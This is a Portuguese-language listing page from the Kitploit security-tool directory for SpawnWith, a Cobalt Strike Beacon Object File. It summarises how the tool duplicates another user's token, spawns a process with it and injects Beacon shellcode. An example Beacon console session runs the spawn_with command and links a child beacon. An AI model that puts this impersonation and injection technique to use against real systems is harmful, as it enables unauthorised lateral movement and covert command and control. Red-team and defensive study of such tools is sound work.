Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SpawnWith — Cobalt Strike BOF que inicia um processo usando o token de outro usuário e injeta shellcode do Beacon, permitindo pós-exploração e movimento lateral via impersonação. | Kitploit
Ferramentas/GitHubGitHub/rasta-mouse/spawnwith
Escalada de PrivilégiosFerramentas de ImpersonaçãoMovimento LateralPós-ExploraçãoComando e Controle
GitHubrasta-mouse/spawnwith

SpawnWith

Cobalt Strike BOF que inicia um processo usando o token de outro usuário e injeta shellcode do Beacon, permitindo pós-exploração e movimento lateral via impersonação.

Ver Repositório
1121722há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SpawnWith

Um arquivo de objeto Beacon (BOF) experimental que fornece uma alternativa aos comandos spawnas e inject. Isso expõe um novo comando, spawn_with [pid] [listener], que executa o seguinte:

  1. Obtém um handle para o processo de destino.
  2. Obtém um handle para o token primário do processo.
  3. Duplica o token primário em um token de impersonação.
  4. Obtém o valor spawnto do Beacon.
  5. Tenta gerar um novo processo com o token duplicado usando CreateProcessWithTokenW.
    • Se essa tentativa falhar, tenta CreateProcessAsUserW.
  6. Injeta o shellcode do Beacon no processo gerado.
    • Vincula-se ao Beacon no caso de P2P.

Exemplo

beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)

beacon> ps
22656 21972 wordpad.exe   x64   1   DESKTOP-1U6AHIU\test_user

beacon> spawnto x64 %windir%\sysnative\notepad.exe

beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:

Spawned PID 45668 and injected 297472 bytes

[+] established link to child beacon: 192.168.0.195

Beacons

Baixar ferramenta